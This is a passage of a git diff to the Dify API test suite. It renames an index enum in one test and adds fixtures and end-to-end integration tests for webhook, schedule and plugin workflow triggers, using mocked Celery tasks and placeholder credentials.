dataset.id, document.id) # Assert: Verify index processor was created but load was not called - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_not_called() def test_enable_segments_to_index_with_parent_child_structure( @@ -350,7 +354,7 @@ class TestEnableSegmentsToIndexTask: ) # Update document to use parent-child index type - document.doc_form = IndexType.PARENT_CHILD_INDEX + document.doc_form = IndexStructureType.PARENT_CHILD_INDEX db.session.commit() # Refresh dataset to ensure doc_form property reflects the updated document @@ -383,7 +387,7 @@ class TestEnableSegmentsToIndexTask: # Assert: Verify parent-child index processing mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( - IndexType.PARENT_CHILD_INDEX + IndexStructureType.PARENT_CHILD_INDEX ) mock_external_service_dependencies["index_processor"].load.assert_called_once() diff --git a/api/tests/test_containers_integration_tests/trigger/__init__.py b/api/tests/test_containers_integration_tests/trigger/__init__.py new file mode 100644 index 0000000000..8b13789179 --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/__init__.py @@ -0,0 +1 @@ + diff --git a/api/tests/test_containers_integration_tests/trigger/conftest.py b/api/tests/test_containers_integration_tests/trigger/conftest.py new file mode 100644 index 0000000000..9c1fd5e0ec --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/conftest.py @@ -0,0 +1,182 @@ +""" +Fixtures for trigger integration tests. + +This module provides fixtures for creating test data (tenant, account, app) +and mock objects used across trigger-related tests. 
+""" + +from __future__ import annotations + +from collections.abc import Generator +from typing import Any + +import pytest +from sqlalchemy.orm import Session + +from models.account import Account, Tenant, TenantAccountJoin, TenantAccountRole +from models.model import App + + +@pytest.fixture +def tenant_and_account(db_session_with_containers: Session) -> Generator[tuple[Tenant, Account], None, None]: + """ + Create a tenant and account for testing. + + This fixture creates a tenant, account, and their association, + then cleans up after the test completes. + + Yields: + tuple[Tenant, Account]: The created tenant and account + """ + tenant = Tenant(name="trigger-e2e") + account = Account(name="tester", email="tester@example.com", interface_language="en-US") + db_session_with_containers.add_all([tenant, account]) + db_session_with_containers.commit() + + join = TenantAccountJoin(tenant_id=tenant.id, account_id=account.id, role=TenantAccountRole.OWNER.value) + db_session_with_containers.add(join) + db_session_with_containers.commit() + + yield tenant, account + + # Cleanup + db_session_with_containers.query(TenantAccountJoin).filter_by(tenant_id=tenant.id).delete() + db_session_with_containers.query(Account).filter_by(id=account.id).delete() + db_session_with_containers.query(Tenant).filter_by(id=tenant.id).delete() + db_session_with_containers.commit() + + +@pytest.fixture +def app_model( + db_session_with_containers: Session, tenant_and_account: tuple[Tenant, Account] +) -> Generator[App, None, None]: + """ + Create an app for testing. + + This fixture creates a workflow app associated with the tenant and account, + then cleans up after the test completes. + + Yields: + App: The created app + """ + tenant, account = tenant_and_account + app = App( + tenant_id=tenant.id, + name="trigger-app", + description="trigger e2e", + mode="workflow", + icon_type="emoji", + icon="robot", + icon_background="#FFEAD5", + enable_site=True, + enable_api=True, + api_rpm=100, + api_rph=1000, + is_demo=False, + is_public=False, + is_universal=False, + created_by=account.id, + ) + db_session_with_containers.add(app) + db_session_with_containers.commit() + + yield app + + # Cleanup - delete related records first + from models.trigger import ( + AppTrigger, + TriggerSubscription, + WorkflowPluginTrigger, + WorkflowSchedulePlan, + WorkflowTriggerLog, + WorkflowWebhookTrigger, + ) + from models.workflow import Workflow + + db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowSchedulePlan).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowWebhookTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(WorkflowPluginTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(AppTrigger).filter_by(app_id=app.id).delete() + db_session_with_containers.query(TriggerSubscription).filter_by(tenant_id=tenant.id).delete() + db_session_with_containers.query(Workflow).filter_by(app_id=app.id).delete() + db_session_with_containers.query(App).filter_by(id=app.id).delete() + db_session_with_containers.commit() + + +class MockCeleryGroup: + """Mock for celery group() function that collects dispatched tasks.""" + + def __init__(self) -> None: + self.collected: list[dict[str, Any]] = [] + self._applied = False + + def __call__(self, items: Any) -> MockCeleryGroup: + self.collected = list(items) + return self + + def apply_async(self) -> None: + self._applied = True + + @property + def 
applied(self) -> bool: + return self._applied + + +class MockCelerySignature: + """Mock for celery task signature that returns task info dict.""" + + def s(self, schedule_id: str) -> dict[str, str]: + return {"schedule_id": schedule_id} + + +@pytest.fixture +def mock_celery_group() -> MockCeleryGroup: + """ + Provide a mock celery group for testing task dispatch. + + Returns: + MockCeleryGroup: Mock group that collects dispatched tasks + """ + return MockCeleryGroup() + + +@pytest.fixture +def mock_celery_signature() -> MockCelerySignature: + """ + Provide a mock celery signature for testing task dispatch. + + Returns: + MockCelerySignature: Mock signature generator + """ + return MockCelerySignature() + + +class MockPluginSubscription: + """Mock plugin subscription for testing plugin triggers.""" + + def __init__( + self, + subscription_id: str = "sub-1", + tenant_id: str = "tenant-1", + provider_id: str = "provider-1", + ) -> None: + self.id = subscription_id + self.tenant_id = tenant_id + self.provider_id = provider_id + self.credentials: dict[str, str] = {"token": "secret"} + self.credential_type = "api-key" + + def to_entity(self) -> MockPluginSubscription: + return self + + +@pytest.fixture +def mock_plugin_subscription() -> MockPluginSubscription: + """ + Provide a mock plugin subscription for testing. + + Returns: + MockPluginSubscription: Mock subscription instance + """ + return MockPluginSubscription() diff --git a/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py b/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py new file mode 100644 index 0000000000..604d68f257 --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py @@ -0,0 +1,911 @@ +from __future__ import annotations + +import importlib +import json +import time +from datetime import timedelta +from types import SimpleNamespace +from typing import Any + +import pytest +from flask import Flask, Response +from flask.testing import FlaskClient +from sqlalchemy.orm import Session + +from configs import dify_config +from core.plugin.entities.request import TriggerInvokeEventResponse +from core.trigger.debug import event_selectors +from core.trigger.debug.event_bus import TriggerDebugEventBus +from core.trigger.debug.event_selectors import PluginTriggerDebugEventPoller, WebhookTriggerDebugEventPoller +from core.trigger.debug.events import PluginTriggerDebugEvent, build_plugin_pool_key +from core.workflow.enums import NodeType +from libs.datetime_utils import naive_utc_now +from models.account import Account, Tenant +from models.enums import AppTriggerStatus, AppTriggerType, CreatorUserRole, WorkflowTriggerStatus +from models.model import App +from models.trigger import ( + AppTrigger, + TriggerSubscription, + WorkflowPluginTrigger, + WorkflowSchedulePlan, + WorkflowTriggerLog, + WorkflowWebhookTrigger, +) +from models.workflow import Workflow +from schedule import workflow_schedule_task +from schedule.workflow_schedule_task import poll_workflow_schedules +from services import feature_service as feature_service_module +from services.trigger import webhook_service +from services.trigger.schedule_service import ScheduleService +from services.workflow_service import WorkflowService +from tasks import trigger_processing_tasks + +from .conftest import MockCeleryGroup, MockCelerySignature, MockPluginSubscription + +# Test constants +WEBHOOK_ID_PRODUCTION = "wh1234567890123456789012" +WEBHOOK_ID_DEBUG = "whdebug1234567890123456" +TEST_TRIGGER_URL = 
"https://trigger.example.com/base" + + +def _build_workflow_graph(root_node_id: str, trigger_type: NodeType) -> str: + """Build a minimal workflow graph JSON for testing.""" + node_data: dict[str, Any] = {"type": trigger_type.value, "title": "trigger"} + if trigger_type == NodeType.TRIGGER_WEBHOOK: + node_data.update( + { + "method": "POST", + "content_type": "application/json", + "headers": [], + "params": [], + "body": [], + } + ) + graph = { + "nodes": [ + {"id": root_node_id, "data": node_data}, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": root_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + return json.dumps(graph) + + +def test_publish_blocks_start_and_trigger_coexistence( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Publishing should fail when both start and trigger nodes coexist.""" + tenant, account = tenant_and_account + + graph = { + "nodes": [ + {"id": "start", "data": {"type": NodeType.START.value}}, + {"id": "trig", "data": {"type": NodeType.TRIGGER_WEBHOOK.value}}, + ], + "edges": [], + } + draft_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.VERSION_DRAFT, + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(draft_workflow) + db_session_with_containers.commit() + + workflow_service = WorkflowService() + + monkeypatch.setattr( + feature_service_module.FeatureService, + "get_system_features", + classmethod(lambda _cls: SimpleNamespace(plugin_manager=SimpleNamespace(enabled=False))), + ) + monkeypatch.setattr("services.workflow_service.dify_config", SimpleNamespace(BILLING_ENABLED=False)) + + with pytest.raises(ValueError, match="Start node and trigger nodes cannot coexist"): + workflow_service.publish_workflow(session=db_session_with_containers, app_model=app_model, account=account) + + +def test_trigger_url_uses_config_base(monkeypatch: pytest.MonkeyPatch) -> None: + """TRIGGER_URL config should be reflected in generated webhook and plugin endpoints.""" + original_url = getattr(dify_config, "TRIGGER_URL", None) + + try: + monkeypatch.setattr(dify_config, "TRIGGER_URL", TEST_TRIGGER_URL) + endpoint_module = importlib.reload(importlib.import_module("core.trigger.utils.endpoint")) + + assert ( + endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION) + == f"{TEST_TRIGGER_URL}/triggers/webhook/{WEBHOOK_ID_PRODUCTION}" + ) + assert ( + endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION, True) + == f"{TEST_TRIGGER_URL}/triggers/webhook-debug/{WEBHOOK_ID_PRODUCTION}" + ) + assert ( + endpoint_module.generate_plugin_trigger_endpoint_url("end-1") == f"{TEST_TRIGGER_URL}/triggers/plugin/end-1" + ) + finally: + # Restore original config and reload module + if original_url is not None: + monkeypatch.setattr(dify_config, "TRIGGER_URL", original_url) + importlib.reload(importlib.import_module("core.trigger.utils.endpoint")) + + +def test_webhook_trigger_creates_trigger_log( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Production webhook trigger should create a trigger log in the database.""" + tenant, 
account = tenant_and_account + + webhook_node_id = "webhook-node" + graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK) + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=graph_json, + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + webhook_trigger = WorkflowWebhookTrigger( + app_id=app_model.id, + node_id=webhook_node_id, + tenant_id=tenant.id, + webhook_id=WEBHOOK_ID_PRODUCTION, + created_by=account.id, + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=webhook_node_id, + trigger_type=AppTriggerType.TRIGGER_WEBHOOK, + status=AppTriggerStatus.ENABLED, + title="webhook", + ) + + db_session_with_containers.add_all([webhook_trigger, app_trigger]) + db_session_with_containers.commit() + + def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace: + log = WorkflowTriggerLog( + tenant_id=trigger_data.tenant_id, + app_id=trigger_data.app_id, + workflow_id=trigger_data.workflow_id, + root_node_id=trigger_data.root_node_id, + trigger_metadata=trigger_data.trigger_metadata.model_dump_json() if trigger_data.trigger_metadata else "{}", + trigger_type=trigger_data.trigger_type, + workflow_run_id=None, + outputs=None, + trigger_data=trigger_data.model_dump_json(), + inputs=json.dumps(dict(trigger_data.inputs)), + status=WorkflowTriggerStatus.SUCCEEDED, + error="", + queue_name="triggered_workflow_dispatcher", + celery_task_id="celery-test", + created_by_role=CreatorUserRole.ACCOUNT, + created_by=account.id, + ) + session.add(log) + session.commit() + return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test") + + monkeypatch.setattr( + webhook_service.AsyncWorkflowService, + "trigger_workflow_async", + _fake_trigger_workflow_async, + ) + + response = test_client_with_containers.post(f"/triggers/webhook/{webhook_trigger.webhook_id}", json={"foo": "bar"}) + + assert response.status_code == 200 + + db_session_with_containers.expire_all() + logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all() + assert logs, "Webhook trigger should create trigger log" + + +@pytest.mark.parametrize("schedule_type", ["visual", "cron"]) +def test_schedule_poll_dispatches_due_plan( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + mock_celery_group: MockCeleryGroup, + mock_celery_signature: MockCelerySignature, + monkeypatch: pytest.MonkeyPatch, + schedule_type: str, +) -> None: + """Schedule plans (both visual and cron) should be polled and dispatched when due.""" + tenant, _ = tenant_and_account + + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=f"schedule-{schedule_type}", + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + status=AppTriggerStatus.ENABLED, + title=f"schedule-{schedule_type}", + ) + plan = WorkflowSchedulePlan( + app_id=app_model.id, + node_id=f"schedule-{schedule_type}", + tenant_id=tenant.id, + cron_expression="* * * * *", + timezone="UTC", + next_run_at=naive_utc_now() - timedelta(minutes=1), + ) + db_session_with_containers.add_all([app_trigger, plan]) + 
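# (Editor's sketch, hedged: the plan above is made "due" by backdating next_run_at
# one minute. The dispatch criterion inside poll_workflow_schedules is assumed to
# be roughly a comparison against the current time, for example:
#
#     due_plans = session.query(WorkflowSchedulePlan).filter(
#         WorkflowSchedulePlan.next_run_at <= naive_utc_now()
#     )
#
# where `session` is illustrative; the real query may also filter on trigger
# status.)
+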
db_session_with_containers.commit() + + next_time = naive_utc_now() + timedelta(hours=1) + monkeypatch.setattr(workflow_schedule_task, "calculate_next_run_at", lambda *_args, **_kwargs: next_time) + monkeypatch.setattr(workflow_schedule_task, "group", mock_celery_group) + monkeypatch.setattr(workflow_schedule_task, "run_schedule_trigger", mock_celery_signature) + + poll_workflow_schedules() + + assert mock_celery_group.collected, f"Should dispatch signatures for due {schedule_type} schedules" + scheduled_ids = {sig["schedule_id"] for sig in mock_celery_group.collected} + assert plan.id in scheduled_ids + + +def test_schedule_visual_debug_poll_generates_event(monkeypatch: pytest.MonkeyPatch) -> None: + """Visual mode schedule node should generate event in single-step debug.""" + base_now = naive_utc_now() + monkeypatch.setattr(event_selectors, "naive_utc_now", lambda: base_now) + monkeypatch.setattr( + event_selectors, + "calculate_next_run_at", + lambda *_args, **_kwargs: base_now - timedelta(minutes=1), + ) + node_config = { + "id": "schedule-visual", + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "mode": "visual", + "frequency": "daily", + "visual_config": {"time": "3:00 PM"}, + "timezone": "UTC", + }, + } + poller = event_selectors.ScheduleTriggerDebugEventPoller( + tenant_id="tenant", + user_id="user", + app_id="app", + node_config=node_config, + node_id="schedule-visual", + ) + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"] == {} + + +def test_plugin_trigger_dispatches_and_debug_events( + test_client_with_containers: FlaskClient, + mock_plugin_subscription: MockPluginSubscription, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin trigger endpoint should dispatch events and generate debug events.""" + endpoint_id = "1cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + + debug_events: list[dict[str, Any]] = [] + dispatched_payloads: list[dict[str, Any]] = [] + + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + dispatch_data = { + "user_id": "end-user", + "tenant_id": mock_plugin_subscription.tenant_id, + "endpoint_id": _endpoint_id, + "provider_id": mock_plugin_subscription.provider_id, + "subscription_id": mock_plugin_subscription.id, + "timestamp": int(time.time()), + "events": ["created", "updated"], + "request_id": f"req-{_endpoint_id}", + } + trigger_processing_tasks.dispatch_triggered_workflows_async.delay(dispatch_data) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + monkeypatch.setattr( + trigger_processing_tasks.TriggerDebugEventBus, + "dispatch", + staticmethod(lambda **kwargs: debug_events.append(kwargs) or 1), + ) + + def _fake_delay(dispatch_data: dict[str, Any]) -> None: + dispatched_payloads.append(dispatch_data) + trigger_processing_tasks.dispatch_trigger_debug_event( + events=dispatch_data["events"], + user_id=dispatch_data["user_id"], + timestamp=dispatch_data["timestamp"], + request_id=dispatch_data["request_id"], + subscription=mock_plugin_subscription, + ) + + monkeypatch.setattr( + trigger_processing_tasks.dispatch_triggered_workflows_async, + "delay", + staticmethod(_fake_delay), + ) + + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"hello": "world"}) + + assert response.status_code == 202 + assert dispatched_payloads, "Plugin trigger should enqueue workflow dispatch payload" + assert debug_events, "Plugin trigger should 
dispatch debug events" + dispatched_event_names = {event["event"].name for event in debug_events} + assert dispatched_event_names == {"created", "updated"} + + +def test_webhook_debug_dispatches_event( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Webhook single-step debug should dispatch debug event and be pollable.""" + tenant, account = tenant_and_account + webhook_node_id = "webhook-debug-node" + graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK) + draft_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.VERSION_DRAFT, + graph=graph_json, + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(draft_workflow) + db_session_with_containers.commit() + + webhook_trigger = WorkflowWebhookTrigger( + app_id=app_model.id, + node_id=webhook_node_id, + tenant_id=tenant.id, + webhook_id=WEBHOOK_ID_DEBUG, + created_by=account.id, + ) + db_session_with_containers.add(webhook_trigger) + db_session_with_containers.commit() + + debug_events: list[dict[str, Any]] = [] + original_dispatch = TriggerDebugEventBus.dispatch + monkeypatch.setattr( + "controllers.trigger.webhook.TriggerDebugEventBus.dispatch", + lambda **kwargs: (debug_events.append(kwargs), original_dispatch(**kwargs))[1], + ) + + # Listener polls first to enter waiting pool + poller = WebhookTriggerDebugEventPoller( + tenant_id=tenant.id, + user_id=account.id, + app_id=app_model.id, + node_config=draft_workflow.get_node_config_by_id(webhook_node_id), + node_id=webhook_node_id, + ) + assert poller.poll() is None + + response = test_client_with_containers.post( + f"/triggers/webhook-debug/{webhook_trigger.webhook_id}", + json={"foo": "bar"}, + headers={"Content-Type": "application/json"}, + ) + + assert response.status_code == 200 + assert debug_events, "Debug event should be sent to event bus" + # Second poll should get the event + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"]["webhook_body"]["foo"] == "bar" + assert debug_events[0]["pool_key"].endswith(f":{app_model.id}:{webhook_node_id}") + + +def test_plugin_single_step_debug_flow( + flask_app_with_containers: Flask, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin single-step debug: listen -> dispatch event -> poller receives and returns variables.""" + tenant_id = "tenant-1" + app_id = "app-1" + user_id = "user-1" + node_id = "plugin-node" + provider_id = "langgenius/provider-1/provider-1" + node_config = { + "id": node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin", + "plugin_id": "plugin-1", + "plugin_unique_identifier": "plugin-1", + "provider_id": provider_id, + "event_name": "created", + "subscription_id": "sub-1", + "parameters": {}, + }, + } + # Start listening + poller = PluginTriggerDebugEventPoller( + tenant_id=tenant_id, + user_id=user_id, + app_id=app_id, + node_config=node_config, + node_id=node_id, + ) + assert poller.poll() is None + + from core.trigger.debug.events import build_plugin_pool_key + + pool_key = build_plugin_pool_key( + tenant_id=tenant_id, + provider_id=provider_id, + subscription_id="sub-1", + name="created", + ) + TriggerDebugEventBus.dispatch( + tenant_id=tenant_id, + event=PluginTriggerDebugEvent( + 
timestamp=int(time.time()), + user_id=user_id, + name="created", + request_id="req-1", + subscription_id="sub-1", + provider_id="provider-1", + ), + pool_key=pool_key, + ) + + from core.plugin.entities.request import TriggerInvokeEventResponse + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.invoke_trigger_event", + staticmethod( + lambda **_kwargs: TriggerInvokeEventResponse( + variables={"echo": "pong"}, + cancelled=False, + ) + ), + ) + + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"]["echo"] == "pong" + + +def test_schedule_trigger_creates_trigger_log( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Schedule trigger execution should create WorkflowTriggerLog in database.""" + from tasks import workflow_schedule_tasks + + tenant, account = tenant_and_account + + # Create published workflow with schedule trigger node + schedule_node_id = "schedule-node" + graph = { + "nodes": [ + { + "id": schedule_node_id, + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "title": "schedule", + "mode": "cron", + "cron_expression": "0 9 * * *", + "timezone": "UTC", + }, + }, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": schedule_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + # Create schedule plan + plan = WorkflowSchedulePlan( + app_id=app_model.id, + node_id=schedule_node_id, + tenant_id=tenant.id, + cron_expression="0 9 * * *", + timezone="UTC", + next_run_at=naive_utc_now() - timedelta(minutes=1), + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=schedule_node_id, + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + status=AppTriggerStatus.ENABLED, + title="schedule", + ) + db_session_with_containers.add_all([plan, app_trigger]) + db_session_with_containers.commit() + + # Mock AsyncWorkflowService to create WorkflowTriggerLog + def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace: + log = WorkflowTriggerLog( + tenant_id=trigger_data.tenant_id, + app_id=trigger_data.app_id, + workflow_id=published_workflow.id, + root_node_id=trigger_data.root_node_id, + trigger_metadata="{}", + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + workflow_run_id=None, + outputs=None, + trigger_data=trigger_data.model_dump_json(), + inputs=json.dumps(dict(trigger_data.inputs)), + status=WorkflowTriggerStatus.SUCCEEDED, + error="", + queue_name="schedule_executor", + celery_task_id="celery-schedule-test", + created_by_role=CreatorUserRole.ACCOUNT, + created_by=account.id, + ) + session.add(log) + session.commit() + return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test") + + monkeypatch.setattr( + workflow_schedule_tasks.AsyncWorkflowService, + "trigger_workflow_async", + _fake_trigger_workflow_async, + ) + + # Mock quota to avoid rate limiting + from enums import quota_type + + 
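# (Editor's note, hedged: stubbing QuotaType.TRIGGER.consume with
# quota_type.unlimited() assumes consume() normally returns a quota-check result
# that can throttle a tenant; with the stub in place, the schedule run below can
# never be rate limited, keeping the trigger-log assertions deterministic.)
+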
monkeypatch.setattr(quota_type.QuotaType.TRIGGER, "consume", lambda _tenant_id: quota_type.unlimited()) + + # Execute schedule trigger + workflow_schedule_tasks.run_schedule_trigger(plan.id) + + # Verify WorkflowTriggerLog was created + db_session_with_containers.expire_all() + logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all() + assert logs, "Schedule trigger should create WorkflowTriggerLog" + assert logs[0].trigger_type == AppTriggerType.TRIGGER_SCHEDULE + assert logs[0].root_node_id == schedule_node_id + + +@pytest.mark.parametrize( + ("mode", "frequency", "visual_config", "cron_expression", "expected_cron"), + [ + # Visual mode: hourly + ("visual", "hourly", {"on_minute": 30}, None, "30 * * * *"), + # Visual mode: daily + ("visual", "daily", {"time": "3:00 PM"}, None, "0 15 * * *"), + # Visual mode: weekly + ("visual", "weekly", {"time": "9:00 AM", "weekdays": ["mon", "wed", "fri"]}, None, "0 9 * * 1,3,5"), + # Visual mode: monthly + ("visual", "monthly", {"time": "10:30 AM", "monthly_days": [1, 15]}, None, "30 10 1,15 * *"), + # Cron mode: direct expression + ("cron", None, None, "*/5 * * * *", "*/5 * * * *"), + ], +) +def test_schedule_visual_cron_conversion( + mode: str, + frequency: str | None, + visual_config: dict[str, Any] | None, + cron_expression: str | None, + expected_cron: str, +) -> None: + """Schedule visual config should correctly convert to cron expression.""" + + node_config: dict[str, Any] = { + "id": "schedule-node", + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "mode": mode, + "timezone": "UTC", + }, + } + + if mode == "visual": + node_config["data"]["frequency"] = frequency + node_config["data"]["visual_config"] = visual_config + else: + node_config["data"]["cron_expression"] = cron_expression + + config = ScheduleService.to_schedule_config(node_config) + + assert config.cron_expression == expected_cron, f"Expected {expected_cron}, got {config.cron_expression}" + assert config.timezone == "UTC" + assert config.node_id == "schedule-node" + + +def test_plugin_trigger_full_chain_with_db_verification( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin trigger should create WorkflowTriggerLog and WorkflowPluginTrigger records.""" + + tenant, account = tenant_and_account + + # Create published workflow with plugin trigger node + plugin_node_id = "plugin-trigger-node" + provider_id = "langgenius/test-provider/test-provider" + subscription_id = "sub-plugin-test" + endpoint_id = "2cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + + graph = { + "nodes": [ + { + "id": plugin_node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin", + "plugin_id": "test-plugin", + "plugin_unique_identifier": "test-plugin", + "provider_id": provider_id, + "event_name": "test_event", + "subscription_id": subscription_id, + "parameters": {}, + }, + }, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": plugin_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + 
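+    # Persist the published workflow and point the app at it so that trigger
+    # dispatch resolves this workflow version.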
db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + # Create trigger subscription + subscription = TriggerSubscription( + name="test-subscription", + tenant_id=tenant.id, + user_id=account.id, + provider_id=provider_id, + endpoint_id=endpoint_id, + parameters={}, + properties={}, + credentials={"token": "test-secret"}, + credential_type="api-key", + ) + db_session_with_containers.add(subscription) + db_session_with_containers.commit() + + # Update subscription_id to match the created subscription + graph["nodes"][0]["data"]["subscription_id"] = subscription.id + published_workflow.graph = json.dumps(graph) + db_session_with_containers.commit() + + # Create WorkflowPluginTrigger + plugin_trigger = WorkflowPluginTrigger( + app_id=app_model.id, + tenant_id=tenant.id, + node_id=plugin_node_id, + provider_id=provider_id, + event_name="test_event", + subscription_id=subscription.id, + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=plugin_node_id, + trigger_type=AppTriggerType.TRIGGER_PLUGIN, + status=AppTriggerStatus.ENABLED, + title="plugin", + ) + db_session_with_containers.add_all([plugin_trigger, app_trigger]) + db_session_with_containers.commit() + + # Track dispatched data + dispatched_data: list[dict[str, Any]] = [] + + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + dispatch_data = { + "user_id": "end-user", + "tenant_id": tenant.id, + "endpoint_id": _endpoint_id, + "provider_id": provider_id, + "subscription_id": subscription.id, + "timestamp": int(time.time()), + "events": ["test_event"], + "request_id": f"req-{_endpoint_id}", + } + dispatched_data.append(dispatch_data) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"test": "data"}) + + assert response.status_code == 202 + assert dispatched_data, "Plugin trigger should dispatch event data" + assert dispatched_data[0]["subscription_id"] == subscription.id + assert dispatched_data[0]["events"] == ["test_event"] + + # Verify database records exist + db_session_with_containers.expire_all() + plugin_triggers = ( + db_session_with_containers.query(WorkflowPluginTrigger) + .filter_by(app_id=app_model.id, node_id=plugin_node_id) + .all() + ) + assert plugin_triggers, "WorkflowPluginTrigger record should exist" + assert plugin_triggers[0].provider_id == provider_id + assert plugin_triggers[0].event_name == "test_event" + + +def test_plugin_debug_via_http_endpoint( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin single-step debug via HTTP endpoint should dispatch debug event and be pollable.""" + + tenant, account = tenant_and_account + + provider_id = "langgenius/debug-provider/debug-provider" + endpoint_id = "3cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + event_name = "debug_event" + + # Create subscription + subscription = TriggerSubscription( + name="debug-subscription", + tenant_id=tenant.id, + user_id=account.id, + provider_id=provider_id, + endpoint_id=endpoint_id, + parameters={}, + properties={}, + credentials={"token": 